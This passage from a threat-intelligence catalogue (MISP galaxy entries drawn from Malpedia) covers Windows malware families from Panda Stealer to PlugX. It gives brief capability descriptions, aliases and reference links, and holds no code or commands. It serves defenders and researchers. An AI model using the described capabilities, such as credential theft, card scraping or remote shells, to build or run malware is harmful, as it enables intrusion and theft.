https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html
http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html
https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/

Panda Stealer

The tag is: misp-galaxy:malpedia="Panda Stealer"

Panda Stealer is also known as:

Table 2354. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer
https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html

Paradise

Ransomware.

The tag is: misp-galaxy:malpedia="Paradise"

Paradise is also known as:

Table 2355. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise
https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again
https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/
https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/
https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/
https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/
https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool

Parallax RAT

Parallax is a Remote Access Trojan used by attackers to gain access to a victim’s machine. It was involved in one of the many infamous "coronamalware" campaigns. Basically, the attackers abused the COVID-19 pandemic news to lure victims into opening themed emails spreading parallax.

The tag is: misp-galaxy:malpedia="Parallax RAT"

Parallax RAT is also known as:

ParallaxRAT

Table 2356. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax
https://www.vkremez.com/2020/02/lets-learn-inside-parallax-rat-malware.html
https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html
https://blog.morphisec.com/parallax-rat-active-status
https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/
https://twitter.com/malwrhunterteam/status/1227196799997431809

parasite_http

The tag is: misp-galaxy:malpedia="parasite_http"

parasite_http is also known as:

Table 2357. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http
https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks

Passlock

Ransomware.

The tag is: misp-galaxy:malpedia="Passlock"

Passlock is also known as:

Table 2358. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock
https://id-ransomware.blogspot.com

Pay2Key

The tag is: misp-galaxy:malpedia="Pay2Key"

Pay2Key is also known as:

Cobalt

Table 2359. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key
https://twitter.com/TrendMicroRSRCH/status/1389422784808378370
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://research.checkpoint.com/2020/ransomware-alert-pay2key/
https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf
https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/

PEBBLEDASH

The tag is: misp-galaxy:malpedia="PEBBLEDASH"

PEBBLEDASH is also known as:

Table 2360. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash
https://www.us-cert.gov/ncas/analysis-reports/ar20-133c
https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/
https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1
https://blog.reversinglabs.com/blog/hidden-cobra

PeddleCheap

PeddleCheap is a module of the DanderSpritz framework which surface with the "Lost in Translation" release of TheShadowBrokers leaks. In May 2020, ESET mentioned that they found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.

The tag is: misp-galaxy:malpedia="PeddleCheap"

PeddleCheap is also known as:

Table 2361. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap
https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2#
https://twitter.com/ESETresearch/status/1258353960781598721
https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/

Pekraut

The tag is: misp-galaxy:malpedia="Pekraut"

Pekraut is also known as:

Table 2362. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pekraut
https://www.gdatasoftware.com/blog/2020/04/35849-pekraut-german-rat-starts-gnawing

Penco

The tag is: misp-galaxy:malpedia="Penco"

Penco is also known as:

Table 2363. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.penco

Peppy RAT

Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.

The tag is: misp-galaxy:malpedia="Peppy RAT"

Peppy RAT is also known as:

Table 2364. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.peppy_rat
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

PetrWrap

The tag is: misp-galaxy:malpedia="PetrWrap"

PetrWrap is also known as:

Table 2365. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap
https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/
https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/

Petya

The tag is: misp-galaxy:malpedia="Petya"

Petya is also known as:

Table 2366. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.petya
https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/
https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/
https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/
https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/
https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/
https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html
https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/

pgift

Information gathering and downloading tool used to deliver second stage malware to the infected system

The tag is: misp-galaxy:malpedia="pgift"

pgift is also known as:

ReRol

Table 2367. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift

PhanDoor

The tag is: misp-galaxy:malpedia="PhanDoor"

PhanDoor is also known as:

Table 2368. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor
AhnLabAndariel_a_Subgroup_of_Lazarus%20(3).pdf[AhnLabAndariel_a_Subgroup_of_Lazarus%20(3).pdf]

Philadephia Ransom

The tag is: misp-galaxy:malpedia="Philadephia Ransom"

Philadephia Ransom is also known as:

Table 2369. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom
https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html
https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/

Phobos

Ransomware.

The tag is: misp-galaxy:malpedia="Phobos"

Phobos is also known as:

Table 2370. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf
https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://www.sri.ro/articole/atac-cibernetic-cu-aplicatia-ransomware-phobos
https://blog.morphisec.com/the-fair-upgrade-variant-of-phobos-ransomware
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/
https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/
https://securelist.com/cis-ransomware/104452/
https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/
https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

Phoenix Keylogger

Keylogger, information stealer.

The tag is: misp-galaxy:malpedia="Phoenix Keylogger"

Phoenix Keylogger is also known as:

Table 2371. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger
https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/
https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger

PHOREAL

Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53

The tag is: misp-galaxy:malpedia="PHOREAL"

PHOREAL is also known as:

Rizzo

Table 2372. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal
https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf
https://www.secureworks.com/research/threat-profiles/tin-woodlawn

Phorpiex

Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.

The tag is: misp-galaxy:malpedia="Phorpiex"

Phorpiex is also known as:

Trik

Table 2373. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet
https://research.checkpoint.com/2019/phorpiex-breakdown/
https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/
https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/
https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.johannesbader.ch/2016/02/phorpiex/
https://therecord.media/phorpiex-botnet-shuts-down-source-code-goes-up-for-sale/
https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/
https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/
https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows

PICKPOCKET

PICKPOCKET is a credential theft tool that dumps the user’s website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.

The tag is: misp-galaxy:malpedia="PICKPOCKET"

PICKPOCKET is also known as:

Table 2374. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Pierogi

The tag is: misp-galaxy:malpedia="Pierogi"

Pierogi is also known as:

Table 2375. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pierogi
https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf

PILLOWMINT

According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory. Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged) Contains additional backdoor capabilities including: Running processes Downloading and executing files (T1105: Remote File Copy) Downloading and injecting DLLs (T1055: Process Injection) Communicates with a command and control (C2) server over HTTP using AES encrypted messages (T1071: Standard Application Layer Protocol) (T1032: Standard Cryptographic Protocol)

The tag is: misp-galaxy:malpedia="PILLOWMINT"

PILLOWMINT is also known as:

Table 2376. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

PingBack

The tag is: misp-galaxy:malpedia="PingBack"

PingBack is also known as:

Table 2377. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pingback
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel/

pipcreat

The tag is: misp-galaxy:malpedia="pipcreat"

pipcreat is also known as:

Table 2378. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat
https://www.snort.org/rule_docs/1-26941

pirpi

The tag is: misp-galaxy:malpedia="pirpi"

pirpi is also known as:

CookieCutter
SHOTPUT

Table 2379. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html
https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
https://www.secureworks.com/research/threat-profiles/bronze-mayfair
https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

Pitou

The tag is: misp-galaxy:malpedia="Pitou"

Pitou is also known as:

Table 2380. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou
https://isc.sans.edu/diary/rss/25068
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.565.9211&rep=rep1&type=pdf
https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf
https://www.tgsoft.it/english/news_archivio_eng.asp?id=884
https://johannesbader.ch/2019/07/the-dga-of-pitou/

PittyTiger RAT

The tag is: misp-galaxy:malpedia="PittyTiger RAT"

PittyTiger RAT is also known as:

Table 2381. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat
https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf
https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/

Pkybot

Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.

The tag is: misp-galaxy:malpedia="Pkybot"

Pkybot is also known as:

Bublik
Pykbot
TBag

Table 2382. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot
http://blog.kleissner.org/?p=788
http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot

PLAINTEE

The tag is: misp-galaxy:malpedia="PLAINTEE"

PLAINTEE is also known as:

Table 2383. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://www.secureworks.com/research/threat-profiles/bronze-overbrook
https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

playwork

The tag is: misp-galaxy:malpedia="playwork"

playwork is also known as:

Table 2384. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork
https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html

PLEAD (Windows)

PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.

The tag is: misp-galaxy:malpedia="PLEAD (Windows)"

PLEAD (Windows) is also known as:

DRAWDOWN
GOODTIMES
Linopid

Table 2385. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.plead
https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html
https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html
https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html
https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf
https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/
https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/
https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt
https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/
https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020
https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html
http://www.freebuf.com/column/159865.html
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf
http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape
https://securelist.com/apt-trends-report-q2-2019/91897/
https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf
https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf
https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html
https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/

Ploutus ATM

The tag is: misp-galaxy:malpedia="Ploutus ATM"

Ploutus ATM is also known as:

Table 2386. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm
https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html
https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf
http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html
https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html

ployx

The tag is: misp-galaxy:malpedia="ployx"

ployx is also known as:

Table 2387. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx
https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html
https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj_{Ployx-A/detailed-analysis.aspx[https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj}Ployx-A/detailed-analysis.aspx]

PlugX

RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim’s machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.

Notable features of this malware family are the ability to execute commands on the affected machine to retrieve: machine information capture the screen send keyboard and mouse events keylogging reboot the system manage processes (create, kill and enumerate) manage services (create, start, stop, etc.); and manage Windows registry entries, open a shell, etc.

The malware also logs its events in a text log file.

The tag is: misp-galaxy:malpedia="PlugX"

PlugX is also known as:

Destroy RAT
Kaba
Korplug
Sogu
TIGERPLUG

Table 2388. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://community.rsa.com/thread/185439
https://www.recordedfuture.com/redecho-targeting-indian-power-sector/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.secureworks.com/research/threat-profiles/bronze-president
http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html
https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/
https://securelist.com/apt-trends-report-q2-2020/97937/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf
https://www.recordedfuture.com/china-linked-ta428-threat-group
http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape
https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited
https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf
https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report
https://www.secureworks.com/research/threat-profiles/bronze-union
https://www.secureworks.com/research/threat-profiles/bronze-firestone
https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/
https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage
https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/
https://blog.xorhex.com/blog/mustangpandaplugx-1/
https://www.youtube.com/watch?v=6SDdUVejR2w
https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/
https://unit42.paloaltonetworks.com/thor-plugx-variant/
https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf
https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/
https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/
https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/
https://securelist.com/cycldek-bridging-the-air-gap/97157/
https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf
https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/
https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html
https://www.lac.co.jp/lacwatch/people/20171218_001445.html
https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://blog.ensilo.com/uncovering-new-activity-by-apt10
http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/
https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf
https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/
https://blog.xorhex.com/blog/reddeltaplugxchangeup/
https://securelist.com/time-of-death-connected-medicine/84315/
https://tracker.h3x.eu/info/290
https://www.contextis.com/de/blog/avivore
https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/
https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf
https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader
https://www.secureworks.com/research/threat-profiles/bronze-keystone
https://www.secureworks.com/research/threat-profiles/bronze-overbrook
https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/
https://therecord.media/redecho-group-parks-domains-after-public-exposure/
https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader
https://www.secureworks.com/research/threat-profiles/bronze-express
https://www.secureworks.com/research/threat-profiles/bronze-olive
https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf
https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/
https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/
https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/
https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf
https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/
https://securelist.com/apt-trends-report-q3-2020/99204/
https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html
https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf
https://www.macnica.net/file/security_report_20160613.pdf
https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-
https://www.us-cert.gov/ncas/alerts/TA17-117A
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://twitter.com/stvemillertime/status/1261263000960450562
https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf
https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html
https://www.secureworks.com/research/threat-profiles/bronze-atlas
https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf
https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf
https://blog.xorhex.com/blog/mustangpandaplugx-2/
https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt
https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn
https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/
https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html
https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/
https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html
https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
https://www.secureworks.com/research/bronze-president-targets-ngos
https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/
https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf
https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/
https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia
https://twitter.com/xorhex/status/1399906601562165249?s=20
https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/
https://www.secureworks.com/research/threat-profiles/bronze-woodland
http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html
https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/
https://risky.biz/whatiswinnti/
https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf
https://www.secureworks.com/research/threat-profiles/bronze-riverside
